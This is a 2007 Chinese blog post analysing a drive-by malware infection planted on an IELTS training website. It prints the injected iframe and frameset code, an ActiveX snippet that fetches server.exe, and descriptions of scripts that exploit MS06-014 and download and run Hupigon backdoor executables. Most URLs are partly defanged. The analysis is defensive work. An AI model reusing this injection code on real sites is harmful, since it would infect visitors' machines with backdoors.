某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq

标签: 解密javascriptiframestylesheetcookiesapplet
1388人阅读 评论(0) 收藏 举报
分类:

某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq

endurer 原创
2007-09-12 第1
2007-09-13 第2版 补充瑞星对 server.exe 的回复

网页包含代码:
/---
<iframe src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
---/

hxxp://www.be**a**utyco**nce*pt.cn/asp/index.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:

/---
<script src=hxxp://c*s.cs*kic**k.cn/cs/c.js></script><frameset rows="444,0" cols="*">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index0.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index2.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/dns.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ie.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ie1.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/xp.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/index.asp" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/ka.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
<frame src="hxxp://www.be**a**utyco**nce*pt.cn/asp/3800hk.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
---/


hxxp://c*s.cs*kic**k.cn/cs/c.js 的功能是检测 cookies变量 npconfig,若不存在则创建,并输出代码:
/---
<script language="javascript" src="hxxp://c*s.cs*kic**k.cn/cs/nc.js"></script>
---/

hxxp://c*s.cs*kic**k.cn/cs/nc.js 检测 MS06-014 漏洞,若存在则输出代码:
/---
<iframe width="0" height="0" src="hxxp://c*s.cs*kic**k.cn/cs/logo.htm"></iframe>
---/
否则输出代码:
/---
<iframe width="0" height="0" src="hxxp://c*s.cs*kic**k.cn/cs/file.htm"></iframe>
---/

hxxp://c*s.cs*kic**k.cn/cs/logo.htm 内容为:
/---
<link rel="stylesheet" href="GnYiVsAQ.CSS">
<Script language="Javascript" src="haha.js"></Script>
<IFRAME frameBorder=no height=1 src="2.htm" width=1></IFRAME>
---/

GnYiVsAQ.CSS 内容为:
/---
<STYLE type=text/css>
<!--
body {CURSOR: url('lo.jpg')}
--></STYLE>
---/

hxxp://c*s.cs*kic**k.cn/cs/lo.jpg 未能打开。

hxxp://c*s.cs*kic**k.cn/cs/haha.js 的功能是利用 ThunderServer.webThunder,调用IE 打开exec.htm,运行IE缓存中的 update[1].exe, 创建文件 C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Windows.hta。

hxxp://c*s.cs*kic**k.cn/cs/exec.htm 包含代码:
/---
<script src="sf.exe"></script>
---/

sf.exe 未能下载。

hxxp://c*s.cs*kic**k.cn/cs/2.htm 输出escape()加密的代码:
/---
<embed type="audio/x-pn-realaudio-plugin"
src="music.smi"
controls="controlpanel,statusbar" height=2
width=0 autostart=true>
---/

music.smi 为漏洞利用代码,瑞星报为:Hack.Exploit.Agent.dk

hxxp://c*s.cs*kic**k.cn/cs/file.htm 包含代码:
/---
<SCRIPT language="JScript.Encode" src=file.jpg></script>
---/

hxxp://c*s.cs*kic**k.cn/cs/file.jpg 的内容解密后为 下载 hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg,保存为~tmp.exe,通过 cmd.exe /c 来运行。

hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg 未能下载。


hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:

/---
<script language=javascript src="ta.js"></script> 
---/

ta.js 下载 hxxp://www.be**a**utyco**nce*pt.cn/asp/server.exe,保存为  hk.exe,并运行。

瑞星报为 Trojan.DL.JS.Small.jd

文件说明符 : D:/test/server.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-11 23:35:50
修改时间 : 2007-9-11 23:35:56
访问时间 : 2007-9-11 23:37:9
大小 : 950784 字节 928.512 KB
MD5 : 0856b705b41ba7c140b1772fc589b531
HSA1: 3DFF4F937FE7020AEFB70295281283EC75F6BF63

Scanned file:   server.exe - Infected

server.exe - infected by Backdoor.Win32.Hupigon.jmq

主 题: 病毒上报邮件分析结果-流水单号:20070911234829077058
  发件人: "" <send@rising.net.cn>    发送时间:2007.09.13 11:22
尊敬的客户,您好!
    您的邮件已经收到,感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
    1.文件名:server.exe
    病毒名:Dropper.Win32.BlackHole.a

    您所上报的病毒文件将在19.40.32版本中处理解决。

hxxp://www.be**a**utyco**nce*pt.cn/asp/index0.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,从而
1。下载 server.exe,保存为 cike.exe,创建 cike.vbs 来运行。
2。下载 hxxp://bbs.h**n*p*j**.com/pic*/logo2.jpg,保存为 taskmgr.exe,创建 taskmgr.vbs 来运行。

hxxp://www.be**a**utyco**nce*pt.cn/asp/index2.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是检测 cookies 变量 Chg 是否存在,不存在则创建,并利用 APPLET 修改注册表 HKCU/Software/Microsoft/Windows/CurrentVersion/Internet Settings/Zones/3/1004,并打开网页 ActiveX1.htm

ActiveX1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,其中包含代码:
/---
<script src=http://cs~cskick~cn/cs/c~js></script><!doctype html public "-//w3c//dtd html 4~0 transitional//en">
<html><head>
<meta http-equiv=content-type content="text/html; charset=gb2312">
<script language=javascript>
sofzl="<object id=\"sofzlcn\" width=0 height=0 type=\"application/x-oleobject\""
sofzl+="codebase=\"http://www~beautyconcept~cn/asp/server~exe#microsoft=1,1,1,1\">"
sofzl+="<param name=\"_microsoft\" value=\"2008\">"
sofzl+="</object>"
document~open();
document~clear();
document~writeln(sofzl);
document~close();
</script>
---/

hxxp://www.be**a**utyco**nce*pt.cn/asp/dns.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 Cuteqq_Cn.exe并运行。

hxxp://www.be**a**utyco**nce*pt.cn/asp/ie.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 Cuteqq_Cn.exe,创建 Cuteqq_CN.vbs 来运行。

hxxp://www.be**a**utyco**nce*pt.cn/asp/ie1.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是禁止右键关联菜单和拖动选定,下载 server.exe,保存为 sofzlcn.exe,创建 Cuteqq_CN.vbs 来运行。

hxxp://www.be**a**utyco**nce*pt.cn/asp/xp.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是下载 server.exe,保存为 sofzlcn.exe 并运行。

hxxp://www.be**a**utyco**nce*pt.cn/asp/index.asp 包含代码:
/---
<script type="text/javascript" src="index1.asp"></script>
RUN("hxxp://www.be**a**utyco**nce*pt.cn/asp/"
);</script>
---/

hxxp://www.be**a**utyco**nce*pt.cn/asp/index1.asp 未能打开。

hxxp://www.be**a**utyco**nce*pt.cn/asp/ka.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出,功能是 下载 server.exe,保存为 svchost.exe 并运行。

hxxp://www.be**a**utyco**nce*pt.cn/asp/3800hk.htm 内容为使用自定义函数 XOR() 对变量 strHTML 的值进行解密并输出QQ溢出漏洞的代码。

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:2679443次
    • 积分:37965
    • 等级:
    • 排名:第106名
    • 原创:981篇
    • 转载:40篇
    • 译文:108篇
    • 评论:1560条
    文章存档
    最新评论